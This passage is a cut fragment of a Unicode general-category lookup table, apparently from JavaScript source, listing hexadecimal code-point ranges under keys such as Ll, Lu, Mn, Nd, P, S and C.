88-0F8B1000-102A103F1050-1055105A-105D106110651066106E-10701075-1081108E10A0-10C510D0-10FA10FC1100-1248124A-124D1250-12561258125A-125D1260-1288128A-128D1290-12B012B2-12B512B8-12BE12C012C2-12C512C8-12D612D8-13101312-13151318-135A1380-138F13A0-13F41401-166C166F-167F1681-169A16A0-16EA1700-170C170E-17111720-17311740-17511760-176C176E-17701780-17B317D717DC1820-18771880-18A818AA18B0-18F51900-191C1950-196D1970-19741980-19AB19C1-19C71A00-1A161A20-1A541AA71B05-1B331B45-1B4B1B83-1BA01BAE1BAF1C00-1C231C4D-1C4F1C5A-1C7D1CE9-1CEC1CEE-1CF11D00-1DBF1E00-1F151F18-1F1D1F20-1F451F48-1F4D1F50-1F571F591F5B1F5D1F5F-1F7D1F80-1FB41FB6-1FBC1FBE1FC2-1FC41FC6-1FCC1FD0-1FD31FD6-1FDB1FE0-1FEC1FF2-1FF41FF6-1FFC2071207F2090-209421022107210A-211321152119-211D212421262128212A-212D212F-2139213C-213F2145-2149214E218321842C00-2C2E2C30-2C5E2C60-2CE42CEB-2CEE2D00-2D252D30-2D652D6F2D80-2D962DA0-2DA62DA8-2DAE2DB0-2DB62DB8-2DBE2DC0-2DC62DC8-2DCE2DD0-2DD62DD8-2DDE2E2F300530063031-3035303B303C3041-3096309D-309F30A1-30FA30FC-30FF3105-312D3131-318E31A0-31B731F0-31FF3400-4DB54E00-9FCBA000-A48CA4D0-A4FDA500-A60CA610-A61FA62AA62BA640-A65FA662-A66EA67F-A697A6A0-A6E5A717-A71FA722-A788A78BA78CA7FB-A801A803-A805A807-A80AA80C-A822A840-A873A882-A8B3A8F2-A8F7A8FBA90A-A925A930-A946A960-A97CA984-A9B2A9CFAA00-AA28AA40-AA42AA44-AA4BAA60-AA76AA7AAA80-AAAFAAB1AAB5AAB6AAB9-AABDAAC0AAC2AADB-AADDABC0-ABE2AC00-D7A3D7B0-D7C6D7CB-D7FBF900-FA2DFA30-FA6DFA70-FAD9FB00-FB06FB13-FB17FB1DFB1F-FB28FB2A-FB36FB38-FB3CFB3EFB40FB41FB43FB44FB46-FBB1FBD3-FD3DFD50-FD8FFD92-FDC7FDF0-FDFBFE70-FE74FE76-FEFCFF21-FF3AFF41-FF5AFF66-FFBEFFC2-FFC7FFCA-FFCFFFD2-FFD7FFDA-FFDC",Ll:"0061-007A00AA00B500BA00DF-00F600F8-00FF01010103010501070109010B010D010F01110113011501170119011B011D011F01210123012501270129012B012D012F01310133013501370138013A013C013E014001420144014601480149014B014D014F01510153015501570159015B015D015F01610163016501670169016B016D016F0171017301750177017A017C017E-0180018301850188018C018D019201950199-019B019E01A101A301A501A801AA01AB01AD01B001B401B601B901BA01BD-01BF01C601C901CC01CE01D001D201D401D601D801DA01DC01DD01DF01E101E301E501E701E901EB01ED01EF01F001F301F501F901FB01FD01FF02010203020502070209020B020D020F02110213021502170219021B021D021F02210223022502270229022B022D022F02310233-0239023C023F0240024202470249024B024D024F-02930295-02AF037103730377037B-037D039003AC-03CE03D003D103D5-03D703D903DB03DD03DF03E103E303E503E703E903EB03ED03EF-03F303F503F803FB03FC0430-045F04610463046504670469046B046D046F04710473047504770479047B047D047F0481048B048D048F04910493049504970499049B049D049F04A104A304A504A704A904AB04AD04AF04B104B304B504B704B904BB04BD04BF04C204C404C604C804CA04CC04CE04CF04D104D304D504D704D904DB04DD04DF04E104E304E504E704E904EB04ED04EF04F104F304F504F704F904FB04FD04FF05010503050505070509050B050D050F05110513051505170519051B051D051F0521052305250561-05871D00-1D2B1D62-1D771D79-1D9A1E011E031E051E071E091E0B1E0D1E0F1E111E131E151E171E191E1B1E1D1E1F1E211E231E251E271E291E2B1E2D1E2F1E311E331E351E371E391E3B1E3D1E3F1E411E431E451E471E491E4B1E4D1E4F1E511E531E551E571E591E5B1E5D1E5F1E611E631E651E671E691E6B1E6D1E6F1E711E731E751E771E791E7B1E7D1E7F1E811E831E851E871E891E8B1E8D1E8F1E911E931E95-1E9D1E9F1EA11EA31EA51EA71EA91EAB1EAD1EAF1EB11EB31EB51EB71EB91EBB1EBD1EBF1EC11EC31EC51EC71EC91ECB1ECD1ECF1ED11ED31ED51ED71ED91EDB1EDD1EDF1EE11EE31EE51EE71EE91EEB1EED1EEF1EF11EF31EF51EF71EF91EFB1EFD1EFF-1F071F10-1F151F20-1F271F30-1F371F40-1F451F50-1F571F60-1F671F70-1F7D1F80-1F871F90-1F971FA0-1FA71FB0-1FB41FB61FB71FBE1FC2-1FC41FC61FC71FD0-1FD31FD61FD71FE0-1FE71FF2-1FF41FF61FF7210A210E210F2113212F21342139213C213D2146-2149214E21842C30-2C5E2C612C652C662C682C6A2C6C2C712C732C742C76-2C7C2C812C832C852C872C892C8B2C8D2C8F2C912C932C952C972C992C9B2C9D2C9F2CA12CA32CA52CA72CA92CAB2CAD2CAF2CB12CB32CB52CB72CB92CBB2CBD2CBF2CC12CC32CC52CC72CC92CCB2CCD2CCF2CD12CD32CD52CD72CD92CDB2CDD2CDF2CE12CE32CE42CEC2CEE2D00-2D25A641A643A645A647A649A64BA64DA64FA651A653A655A657A659A65BA65DA65FA663A665A667A669A66BA66DA681A683A685A687A689A68BA68DA68FA691A693A695A697A723A725A727A729A72BA72DA72F-A731A733A735A737A739A73BA73DA73FA741A743A745A747A749A74BA74DA74FA751A753A755A757A759A75BA75DA75FA761A763A765A767A769A76BA76DA76FA771-A778A77AA77CA77FA781A783A785A787A78CFB00-FB06FB13-FB17FF41-FF5A",Lu:"0041-005A00C0-00D600D8-00DE01000102010401060108010A010C010E01100112011401160118011A011C011E01200122012401260128012A012C012E01300132013401360139013B013D013F0141014301450147014A014C014E01500152015401560158015A015C015E01600162016401660168016A016C016E017001720174017601780179017B017D018101820184018601870189-018B018E-0191019301940196-0198019C019D019F01A001A201A401A601A701A901AC01AE01AF01B1-01B301B501B701B801BC01C401C701CA01CD01CF01D101D301D501D701D901DB01DE01E001E201E401E601E801EA01EC01EE01F101F401F6-01F801FA01FC01FE02000202020402060208020A020C020E02100212021402160218021A021C021E02200222022402260228022A022C022E02300232023A023B023D023E02410243-02460248024A024C024E03700372037603860388-038A038C038E038F0391-03A103A3-03AB03CF03D2-03D403D803DA03DC03DE03E003E203E403E603E803EA03EC03EE03F403F703F903FA03FD-042F04600462046404660468046A046C046E04700472047404760478047A047C047E0480048A048C048E04900492049404960498049A049C049E04A004A204A404A604A804AA04AC04AE04B004B204B404B604B804BA04BC04BE04C004C104C304C504C704C904CB04CD04D004D204D404D604D804DA04DC04DE04E004E204E404E604E804EA04EC04EE04F004F204F404F604F804FA04FC04FE05000502050405060508050A050C050E05100512051405160518051A051C051E0520052205240531-055610A0-10C51E001E021E041E061E081E0A1E0C1E0E1E101E121E141E161E181E1A1E1C1E1E1E201E221E241E261E281E2A1E2C1E2E1E301E321E341E361E381E3A1E3C1E3E1E401E421E441E461E481E4A1E4C1E4E1E501E521E541E561E581E5A1E5C1E5E1E601E621E641E661E681E6A1E6C1E6E1E701E721E741E761E781E7A1E7C1E7E1E801E821E841E861E881E8A1E8C1E8E1E901E921E941E9E1EA01EA21EA41EA61EA81EAA1EAC1EAE1EB01EB21EB41EB61EB81EBA1EBC1EBE1EC01EC21EC41EC61EC81ECA1ECC1ECE1ED01ED21ED41ED61ED81EDA1EDC1EDE1EE01EE21EE41EE61EE81EEA1EEC1EEE1EF01EF21EF41EF61EF81EFA1EFC1EFE1F08-1F0F1F18-1F1D1F28-1F2F1F38-1F3F1F48-1F4D1F591F5B1F5D1F5F1F68-1F6F1FB8-1FBB1FC8-1FCB1FD8-1FDB1FE8-1FEC1FF8-1FFB21022107210B-210D2110-211221152119-211D212421262128212A-212D2130-2133213E213F214521832C00-2C2E2C602C62-2C642C672C692C6B2C6D-2C702C722C752C7E-2C802C822C842C862C882C8A2C8C2C8E2C902C922C942C962C982C9A2C9C2C9E2CA02CA22CA42CA62CA82CAA2CAC2CAE2CB02CB22CB42CB62CB82CBA2CBC2CBE2CC02CC22CC42CC62CC82CCA2CCC2CCE2CD02CD22CD42CD62CD82CDA2CDC2CDE2CE02CE22CEB2CEDA640A642A644A646A648A64AA64CA64EA650A652A654A656A658A65AA65CA65EA662A664A666A668A66AA66CA680A682A684A686A688A68AA68CA68EA690A692A694A696A722A724A726A728A72AA72CA72EA732A734A736A738A73AA73CA73EA740A742A744A746A748A74AA74CA74EA750A752A754A756A758A75AA75CA75EA760A762A764A766A768A76AA76CA76EA779A77BA77DA77EA780A782A784A786A78BFF21-FF3A",Lt:"01C501C801CB01F21F88-1F8F1F98-1F9F1FA8-1FAF1FBC1FCC1FFC",Lm:"02B0-02C102C6-02D102E0-02E402EC02EE0374037A0559064006E506E607F407F507FA081A0824082809710E460EC610FC17D718431AA71C78-1C7D1D2C-1D611D781D9B-1DBF2071207F2090-20942C7D2D6F2E2F30053031-3035303B309D309E30FC-30FEA015A4F8-A4FDA60CA67FA717-A71FA770A788A9CFAA70AADDFF70FF9EFF9F",Lo:"01BB01C0-01C3029405D0-05EA05F0-05F20621-063F0641-064A066E066F0671-06D306D506EE06EF06FA-06FC06FF07100712-072F074D-07A507B107CA-07EA0800-08150904-0939093D09500958-096109720979-097F0985-098C098F09900993-09A809AA-09B009B209B6-09B909BD09CE09DC09DD09DF-09E109F009F10A05-0A0A0A0F0A100A13-0A280A2A-0A300A320A330A350A360A380A390A59-0A5C0A5E0A72-0A740A85-0A8D0A8F-0A910A93-0AA80AAA-0AB00AB20AB30AB5-0AB90ABD0AD00AE00AE10B05-0B0C0B0F0B100B13-0B280B2A-0B300B320B330B35-0B390B3D0B5C0B5D0B5F-0B610B710B830B85-0B8A0B8E-0B900B92-0B950B990B9A0B9C0B9E0B9F0BA30BA40BA8-0BAA0BAE-0BB90BD00C05-0C0C0C0E-0C100C12-0C280C2A-0C330C35-0C390C3D0C580C590C600C610C85-0C8C0C8E-0C900C92-0CA80CAA-0CB30CB5-0CB90CBD0CDE0CE00CE10D05-0D0C0D0E-0D100D12-0D280D2A-0D390D3D0D600D610D7A-0D7F0D85-0D960D9A-0DB10DB3-0DBB0DBD0DC0-0DC60E01-0E300E320E330E40-0E450E810E820E840E870E880E8A0E8D0E94-0E970E99-0E9F0EA1-0EA30EA50EA70EAA0EAB0EAD-0EB00EB20EB30EBD0EC0-0EC40EDC0EDD0F000F40-0F470F49-0F6C0F88-0F8B1000-102A103F1050-1055105A-105D106110651066106E-10701075-1081108E10D0-10FA1100-1248124A-124D1250-12561258125A-125D1260-1288128A-128D1290-12B012B2-12B512B8-12BE12C012C2-12C512C8-12D612D8-13101312-13151318-135A1380-138F13A0-13F41401-166C166F-167F1681-169A16A0-16EA1700-170C170E-17111720-17311740-17511760-176C176E-17701780-17B317DC1820-18421844-18771880-18A818AA18B0-18F51900-191C1950-196D1970-19741980-19AB19C1-19C71A00-1A161A20-1A541B05-1B331B45-1B4B1B83-1BA01BAE1BAF1C00-1C231C4D-1C4F1C5A-1C771CE9-1CEC1CEE-1CF12135-21382D30-2D652D80-2D962DA0-2DA62DA8-2DAE2DB0-2DB62DB8-2DBE2DC0-2DC62DC8-2DCE2DD0-2DD62DD8-2DDE3006303C3041-3096309F30A1-30FA30FF3105-312D3131-318E31A0-31B731F0-31FF3400-4DB54E00-9FCBA000-A014A016-A48CA4D0-A4F7A500-A60BA610-A61FA62AA62BA66EA6A0-A6E5A7FB-A801A803-A805A807-A80AA80C-A822A840-A873A882-A8B3A8F2-A8F7A8FBA90A-A925A930-A946A960-A97CA984-A9B2AA00-AA28AA40-AA42AA44-AA4BAA60-AA6FAA71-AA76AA7AAA80-AAAFAAB1AAB5AAB6AAB9-AABDAAC0AAC2AADBAADCABC0-ABE2AC00-D7A3D7B0-D7C6D7CB-D7FBF900-FA2DFA30-FA6DFA70-FAD9FB1DFB1F-FB28FB2A-FB36FB38-FB3CFB3EFB40FB41FB43FB44FB46-FBB1FBD3-FD3DFD50-FD8FFD92-FDC7FDF0-FDFBFE70-FE74FE76-FEFCFF66-FF6FFF71-FF9DFFA0-FFBEFFC2-FFC7FFCA-FFCFFFD2-FFD7FFDA-FFDC",M:"0300-036F0483-04890591-05BD05BF05C105C205C405C505C70610-061A064B-065E067006D6-06DC06DE-06E406E706E806EA-06ED07110730-074A07A6-07B007EB-07F30816-0819081B-08230825-08270829-082D0900-0903093C093E-094E0951-0955096209630981-098309BC09BE-09C409C709C809CB-09CD09D709E209E30A01-0A030A3C0A3E-0A420A470A480A4B-0A4D0A510A700A710A750A81-0A830ABC0ABE-0AC50AC7-0AC90ACB-0ACD0AE20AE30B01-0B030B3C0B3E-0B440B470B480B4B-0B4D0B560B570B620B630B820BBE-0BC20BC6-0BC80BCA-0BCD0BD70C01-0C030C3E-0C440C46-0C480C4A-0C4D0C550C560C620C630C820C830CBC0CBE-0CC40CC6-0CC80CCA-0CCD0CD50CD60CE20CE30D020D030D3E-0D440D46-0D480D4A-0D4D0D570D620D630D820D830DCA0DCF-0DD40DD60DD8-0DDF0DF20DF30E310E34-0E3A0E47-0E4E0EB10EB4-0EB90EBB0EBC0EC8-0ECD0F180F190F350F370F390F3E0F3F0F71-0F840F860F870F90-0F970F99-0FBC0FC6102B-103E1056-1059105E-10601062-10641067-106D1071-10741082-108D108F109A-109D135F1712-17141732-1734175217531772177317B6-17D317DD180B-180D18A91920-192B1930-193B19B0-19C019C819C91A17-1A1B1A55-1A5E1A60-1A7C1A7F1B00-1B041B34-1B441B6B-1B731B80-1B821BA1-1BAA1C24-1C371CD0-1CD21CD4-1CE81CED1CF21DC0-1DE61DFD-1DFF20D0-20F02CEF-2CF12DE0-2DFF302A-302F3099309AA66F-A672A67CA67DA6F0A6F1A802A806A80BA823-A827A880A881A8B4-A8C4A8E0-A8F1A926-A92DA947-A953A980-A983A9B3-A9C0AA29-AA36AA43AA4CAA4DAA7BAAB0AAB2-AAB4AAB7AAB8AABEAABFAAC1ABE3-ABEAABECABEDFB1EFE00-FE0FFE20-FE26",Mn:"0300-036F0483-04870591-05BD05BF05C105C205C405C505C70610-061A064B-065E067006D6-06DC06DF-06E406E706E806EA-06ED07110730-074A07A6-07B007EB-07F30816-0819081B-08230825-08270829-082D0900-0902093C0941-0948094D0951-095509620963098109BC09C1-09C409CD09E209E30A010A020A3C0A410A420A470A480A4B-0A4D0A510A700A710A750A810A820ABC0AC1-0AC50AC70AC80ACD0AE20AE30B010B3C0B3F0B41-0B440B4D0B560B620B630B820BC00BCD0C3E-0C400C46-0C480C4A-0C4D0C550C560C620C630CBC0CBF0CC60CCC0CCD0CE20CE30D41-0D440D4D0D620D630DCA0DD2-0DD40DD60E310E34-0E3A0E47-0E4E0EB10EB4-0EB90EBB0EBC0EC8-0ECD0F180F190F350F370F390F71-0F7E0F80-0F840F860F870F90-0F970F99-0FBC0FC6102D-10301032-10371039103A103D103E10581059105E-10601071-1074108210851086108D109D135F1712-17141732-1734175217531772177317B7-17BD17C617C9-17D317DD180B-180D18A91920-19221927192819321939-193B1A171A181A561A58-1A5E1A601A621A65-1A6C1A73-1A7C1A7F1B00-1B031B341B36-1B3A1B3C1B421B6B-1B731B801B811BA2-1BA51BA81BA91C2C-1C331C361C371CD0-1CD21CD4-1CE01CE2-1CE81CED1DC0-1DE61DFD-1DFF20D0-20DC20E120E5-20F02CEF-2CF12DE0-2DFF302A-302F3099309AA66FA67CA67DA6F0A6F1A802A806A80BA825A826A8C4A8E0-A8F1A926-A92DA947-A951A980-A982A9B3A9B6-A9B9A9BCAA29-AA2EAA31AA32AA35AA36AA43AA4CAAB0AAB2-AAB4AAB7AAB8AABEAABFAAC1ABE5ABE8ABEDFB1EFE00-FE0FFE20-FE26",Mc:"0903093E-09400949-094C094E0982098309BE-09C009C709C809CB09CC09D70A030A3E-0A400A830ABE-0AC00AC90ACB0ACC0B020B030B3E0B400B470B480B4B0B4C0B570BBE0BBF0BC10BC20BC6-0BC80BCA-0BCC0BD70C01-0C030C41-0C440C820C830CBE0CC0-0CC40CC70CC80CCA0CCB0CD50CD60D020D030D3E-0D400D46-0D480D4A-0D4C0D570D820D830DCF-0DD10DD8-0DDF0DF20DF30F3E0F3F0F7F102B102C10311038103B103C105610571062-10641067-106D108310841087-108C108F109A-109C17B617BE-17C517C717C81923-19261929-192B193019311933-193819B0-19C019C819C91A19-1A1B1A551A571A611A631A641A6D-1A721B041B351B3B1B3D-1B411B431B441B821BA11BA61BA71BAA1C24-1C2B1C341C351CE11CF2A823A824A827A880A881A8B4-A8C3A952A953A983A9B4A9B5A9BAA9BBA9BD-A9C0AA2FAA30AA33AA34AA4DAA7BABE3ABE4ABE6ABE7ABE9ABEAABEC",Me:"0488048906DE20DD-20E020E2-20E4A670-A672",N:"0030-003900B200B300B900BC-00BE0660-066906F0-06F907C0-07C90966-096F09E6-09EF09F4-09F90A66-0A6F0AE6-0AEF0B66-0B6F0BE6-0BF20C66-0C6F0C78-0C7E0CE6-0CEF0D66-0D750E50-0E590ED0-0ED90F20-0F331040-10491090-10991369-137C16EE-16F017E0-17E917F0-17F91810-18191946-194F19D0-19DA1A80-1A891A90-1A991B50-1B591BB0-1BB91C40-1C491C50-1C5920702074-20792080-20892150-21822185-21892460-249B24EA-24FF2776-27932CFD30073021-30293038-303A3192-31953220-32293251-325F3280-328932B1-32BFA620-A629A6E6-A6EFA830-A835A8D0-A8D9A900-A909A9D0-A9D9AA50-AA59ABF0-ABF9FF10-FF19",Nd:"0030-00390660-066906F0-06F907C0-07C90966-096F09E6-09EF0A66-0A6F0AE6-0AEF0B66-0B6F0BE6-0BEF0C66-0C6F0CE6-0CEF0D66-0D6F0E50-0E590ED0-0ED90F20-0F291040-10491090-109917E0-17E91810-18191946-194F19D0-19DA1A80-1A891A90-1A991B50-1B591BB0-1BB91C40-1C491C50-1C59A620-A629A8D0-A8D9A900-A909A9D0-A9D9AA50-AA59ABF0-ABF9FF10-FF19",Nl:"16EE-16F02160-21822185-218830073021-30293038-303AA6E6-A6EF",No:"00B200B300B900BC-00BE09F4-09F90BF0-0BF20C78-0C7E0D70-0D750F2A-0F331369-137C17F0-17F920702074-20792080-20892150-215F21892460-249B24EA-24FF2776-27932CFD3192-31953220-32293251-325F3280-328932B1-32BFA830-A835",P:"0021-00230025-002A002C-002F003A003B003F0040005B-005D005F007B007D00A100AB00B700BB00BF037E0387055A-055F0589058A05BE05C005C305C605F305F40609060A060C060D061B061E061F066A-066D06D40700-070D07F7-07F90830-083E0964096509700DF40E4F0E5A0E5B0F04-0F120F3A-0F3D0F850FD0-0FD4104A-104F10FB1361-13681400166D166E169B169C16EB-16ED1735173617D4-17D617D8-17DA1800-180A1944194519DE19DF1A1E1A1F1AA0-1AA61AA8-1AAD1B5A-1B601C3B-1C3F1C7E1C7F1CD32010-20272030-20432045-20512053-205E207D207E208D208E2329232A2768-277527C527C627E6-27EF2983-299829D8-29DB29FC29FD2CF9-2CFC2CFE2CFF2E00-2E2E2E302E313001-30033008-30113014-301F3030303D30A030FBA4FEA4FFA60D-A60FA673A67EA6F2-A6F7A874-A877A8CEA8CFA8F8-A8FAA92EA92FA95FA9C1-A9CDA9DEA9DFAA5C-AA5FAADEAADFABEBFD3EFD3FFE10-FE19FE30-FE52FE54-FE61FE63FE68FE6AFE6BFF01-FF03FF05-FF0AFF0C-FF0FFF1AFF1BFF1FFF20FF3B-FF3DFF3FFF5BFF5DFF5F-FF65",Pd:"002D058A05BE140018062010-20152E172E1A301C303030A0FE31FE32FE58FE63FF0D",Ps:"0028005B007B0F3A0F3C169B201A201E2045207D208D23292768276A276C276E27702772277427C527E627E827EA27EC27EE2983298529872989298B298D298F299129932995299729D829DA29FC2E222E242E262E283008300A300C300E3010301430163018301A301DFD3EFE17FE35FE37FE39FE3BFE3DFE3FFE41FE43FE47FE59FE5BFE5DFF08FF3BFF5BFF5FFF62",Pe:"0029005D007D0F3B0F3D169C2046207E208E232A2769276B276D276F27712773277527C627E727E927EB27ED27EF298429862988298A298C298E2990299229942996299829D929DB29FD2E232E252E272E293009300B300D300F3011301530173019301B301E301FFD3FFE18FE36FE38FE3AFE3CFE3EFE40FE42FE44FE48FE5AFE5CFE5EFF09FF3DFF5DFF60FF63",Pi:"00AB2018201B201C201F20392E022E042E092E0C2E1C2E20",Pf:"00BB2019201D203A2E032E052E0A2E0D2E1D2E21",Pc:"005F203F20402054FE33FE34FE4D-FE4FFF3F",Po:"0021-00230025-0027002A002C002E002F003A003B003F0040005C00A100B700BF037E0387055A-055F058905C005C305C605F305F40609060A060C060D061B061E061F066A-066D06D40700-070D07F7-07F90830-083E0964096509700DF40E4F0E5A0E5B0F04-0F120F850FD0-0FD4104A-104F10FB1361-1368166D166E16EB-16ED1735173617D4-17D617D8-17DA1800-18051807-180A1944194519DE19DF1A1E1A1F1AA0-1AA61AA8-1AAD1B5A-1B601C3B-1C3F1C7E1C7F1CD3201620172020-20272030-2038203B-203E2041-20432047-205120532055-205E2CF9-2CFC2CFE2CFF2E002E012E06-2E082E0B2E0E-2E162E182E192E1B2E1E2E1F2E2A-2E2E2E302E313001-3003303D30FBA4FEA4FFA60D-A60FA673A67EA6F2-A6F7A874-A877A8CEA8CFA8F8-A8FAA92EA92FA95FA9C1-A9CDA9DEA9DFAA5C-AA5FAADEAADFABEBFE10-FE16FE19FE30FE45FE46FE49-FE4CFE50-FE52FE54-FE57FE5F-FE61FE68FE6AFE6BFF01-FF03FF05-FF07FF0AFF0CFF0EFF0FFF1AFF1BFF1FFF20FF3CFF61FF64FF65",S:"0024002B003C-003E005E0060007C007E00A2-00A900AC00AE-00B100B400B600B800D700F702C2-02C502D2-02DF02E5-02EB02ED02EF-02FF03750384038503F604820606-0608060B060E060F06E906FD06FE07F609F209F309FA09FB0AF10B700BF3-0BFA0C7F0CF10CF20D790E3F0F01-0F030F13-0F170F1A-0F1F0F340F360F380FBE-0FC50FC7-0FCC0FCE0FCF0FD5-0FD8109E109F13601390-139917DB194019E0-19FF1B61-1B6A1B74-1B7C1FBD1FBF-1FC11FCD-1FCF1FDD-1FDF1FED-1FEF1FFD1FFE20442052207A-207C208A-208C20A0-20B8210021012103-21062108210921142116-2118211E-2123212521272129212E213A213B2140-2144214A-214D214F2190-2328232B-23E82400-24262440-244A249C-24E92500-26CD26CF-26E126E326E8-26FF2701-27042706-2709270C-27272729-274B274D274F-27522756-275E2761-276727942798-27AF27B1-27BE27C0-27C427C7-27CA27CC27D0-27E527F0-29822999-29D729DC-29FB29FE-2B4C2B50-2B592CE5-2CEA2E80-2E992E9B-2EF32F00-2FD52FF0-2FFB300430123013302030363037303E303F309B309C319031913196-319F31C0-31E33200-321E322A-32503260-327F328A-32B032C0-32FE3300-33FF4DC0-4DFFA490-A4C6A700-A716A720A721A789A78AA828-A82BA836-A839AA77-AA79FB29FDFCFDFDFE62FE64-FE66FE69FF04FF0BFF1C-FF1EFF3EFF40FF5CFF5EFFE0-FFE6FFE8-FFEEFFFCFFFD",Sm:"002B003C-003E007C007E00AC00B100D700F703F60606-060820442052207A-207C208A-208C2140-2144214B2190-2194219A219B21A021A321A621AE21CE21CF21D221D421F4-22FF2308-230B23202321237C239B-23B323DC-23E125B725C125F8-25FF266F27C0-27C427C7-27CA27CC27D0-27E527F0-27FF2900-29822999-29D729DC-29FB29FE-2AFF2B30-2B442B47-2B4CFB29FE62FE64-FE66FF0BFF1C-FF1EFF5CFF5EFFE2FFE9-FFEC",Sc:"002400A2-00A5060B09F209F309FB0AF10BF90E3F17DB20A0-20B8A838FDFCFE69FF04FFE0FFE1FFE5FFE6",Sk:"005E006000A800AF00B400B802C2-02C502D2-02DF02E5-02EB02ED02EF-02FF0375038403851FBD1FBF-1FC11FCD-1FCF1FDD-1FDF1FED-1FEF1FFD1FFE309B309CA700-A716A720A721A789A78AFF3EFF40FFE3",So:"00A600A700A900AE00B000B60482060E060F06E906FD06FE07F609FA0B700BF3-0BF80BFA0C7F0CF10CF20D790F01-0F030F13-0F170F1A-0F1F0F340F360F380FBE-0FC50FC7-0FCC0FCE0FCF0FD5-0FD8109E109F13601390-1399194019E0-19FF1B61-1B6A1B74-1B7C210021012103-21062108210921142116-2118211E-2123212521272129212E213A213B214A214C214D214F2195-2199219C-219F21A121A221A421A521A7-21AD21AF-21CD21D021D121D321D5-21F32300-2307230C-231F2322-2328232B-237B237D-239A23B4-23DB23E2-23E82400-24262440-244A249C-24E92500-25B625B8-25C025C2-25F72600-266E2670-26CD26CF-26E126E326E8-26FF2701-27042706-2709270C-27272729-274B274D274F-27522756-275E2761-276727942798-27AF27B1-27BE2800-28FF2B00-2B2F2B452B462B50-2B592CE5-2CEA2E80-2E992E9B-2EF32F00-2FD52FF0-2FFB300430123013302030363037303E303F319031913196-319F31C0-31E33200-321E322A-32503260-327F328A-32B032C0-32FE3300-33FF4DC0-4DFFA490-A4C6A828-A82BA836A837A839AA77-AA79FDFDFFE4FFE8FFEDFFEEFFFCFFFD",Z:"002000A01680180E2000-200A20282029202F205F3000",Zs:"002000A01680180E2000-200A202F205F3000",Zl:"2028",Zp:"2029",C:"0000-001F007F-009F00AD03780379037F-0383038B038D03A20526-05300557055805600588058B-059005C8-05CF05EB-05EF05F5-0605061C061D0620065F06DD070E070F074B074C07B2-07BF07FB-07FF082E082F083F-08FF093A093B094F095609570973-097809800984098D098E0991099209A909B109B3-09B509BA09BB09C509C609C909CA09CF-09D609D8-09DB09DE09E409E509FC-0A000A040A0B-0A0E0A110A120A290A310A340A370A3A0A3B0A3D0A43-0A460A490A4A0A4E-0A500A52-0A580A5D0A5F-0A650A76-0A800A840A8E0A920AA90AB10AB40ABA0ABB0AC60ACA0ACE0ACF0AD1-0ADF0AE40AE50AF00AF2-0B000B040B0D0B0E0B110B120B290B310B340B3A0B3B0B450B460B490B4A0B4E-0B550B58-0B5B0B5E0B640B650B72-0B810B840B8B-0B8D0B910B96-0B980B9B0B9D0BA0-0BA20BA5-0BA70BAB-0BAD0BBA-0BBD0BC3-0BC50BC90BCE0BCF0BD1-0BD60BD8-0BE50BFB-0C000C040C0D0C110C290C340C3A-0C3C0C450C490C4E-0C540C570C5A-0C5F0C640C650C70-0C770C800C810C840C8D0C910CA90CB40CBA0CBB0CC50CC90CCE-0CD40CD7-0CDD0CDF0CE40CE50CF00CF3-0D010D040D0D0D110D290D3A-0D3C0D450D490D4E-0D560D58-0D5F0D640D650D76-0D780D800D810D840D97-0D990DB20DBC0DBE0DBF0DC7-0DC90DCB-0DCE0DD50DD70DE0-0DF10DF5-0E000E3B-0E3E0E5C-0E800E830E850E860E890E8B0E8C0E8E-0E930E980EA00EA40EA60EA80EA90EAC0EBA0EBE0EBF0EC50EC70ECE0ECF0EDA0EDB0EDE-0EFF0F480F6D-0F700F8C-0F8F0F980FBD0FCD0FD9-0FFF10C6-10CF10FD-10FF1249124E124F12571259125E125F1289128E128F12B112B612B712BF12C112C612C712D7131113161317135B-135E137D-137F139A-139F13F5-13FF169D-169F16F1-16FF170D1715-171F1737-173F1754-175F176D17711774-177F17B417B517DE17DF17EA-17EF17FA-17FF180F181A-181F1878-187F18AB-18AF18F6-18FF191D-191F192C-192F193C-193F1941-1943196E196F1975-197F19AC-19AF19CA-19CF19DB-19DD1A1C1A1D1A5F1A7D1A7E1A8A-1A8F1A9A-1A9F1AAE-1AFF1B4C-1B4F1B7D-1B7F1BAB-1BAD1BBA-1BFF1C38-1C3A1C4A-1C4C1C80-1CCF1CF3-1CFF1DE7-1DFC1F161F171F1E1F1F1F461F471F4E1F4F1F581F5A1F5C1F5E1F7E1F7F1FB51FC51FD41FD51FDC1FF01FF11FF51FFF200B-200F202A-202E2060-206F20722073208F2095-209F20B9-20CF20F1-20FF218A-218F23E9-23FF2427-243F244B-245F26CE26E226E4-26E727002705270A270B2728274C274E2753-2755275F27602795-279727B027BF27CB27CD-27CF2B4D-2B4F2B5A-2BFF2C2F2C5F2CF2-2CF82D26-2D2F2D66-2D6E2D70-2D7F2D97-2D9F2DA72DAF2DB72DBF2DC72DCF2DD72DDF2E32-2E7F2E9A2EF4-2EFF2FD6-2FEF2FFC-2FFF3040309730983100-3104312E-3130318F31B8-31BF31E4-31EF321F32FF4DB6-4DBF9FCC-9FFFA48D-A48FA4C7-A4CFA62C-A63FA660A661A674-A67BA698-A69FA6F8-A6FFA78D-A7FAA82C-A82FA83A-A83FA878-A87FA8C5-A8CDA8DA-A8DFA8FC-A8FFA954-A95EA97D-A97FA9CEA9DA-A9DDA9E0-A9FFAA37-AA3FAA4EAA4FAA5AAA5BAA7C-AA7FAAC3-AADAAAE0-ABBFABEEABEFABFA-ABFFD7A4-D7AFD7C7-D7CAD7FC-F8FFFA2EFA2FFA6EFA6FFADA-FAFFFB07-FB12FB18-FB1CFB37FB3DFB3FFB42FB45FBB2-FBD2FD40-FD4FFD90FD91FDC8-FDEFFDFEFDFFFE1A-FE1FFE27-FE2FFE53FE67FE6C-FE6FFE75FEFD-FF00FFBF-FFC1FFC8FFC9FFD0FFD1FFD8FFD9FFDD-FFDFFFE7FFEF-FFFBFFFEFFFF",Cc:"0000-001F007F-009F",Cf:"00AD0600-060306DD070F17B417B5200B-200F202A-202E2060-2064206A-206FFEFFFFF9-FFFB",Co:"E000-F8FF",Cs:"D800-DFFF",Cn:"03780379037F-0383038B038D03A20526-05300557055805600588058B-059005C8-05CF05EB-05EF05F5-05FF06040605061C061D0620065F070E074B074C07B2-07BF07FB-07FF082E082F083F-08FF093A093B094F095609570973-097809800984098D098E0991099209A909B109B3-09B509BA09BB09C509C609C909CA09CF-09D609D8-09DB09DE09E409E509FC-0A000A040A0B-0A0E0A110A120A290A310A340A370A3A0A3B0A3D0A43-0A460A490A4A0A4E-0A500A52-0A580A5D0A5F-0A650A76-0A800A840A8E0A920AA90AB10AB40ABA0ABB0AC60A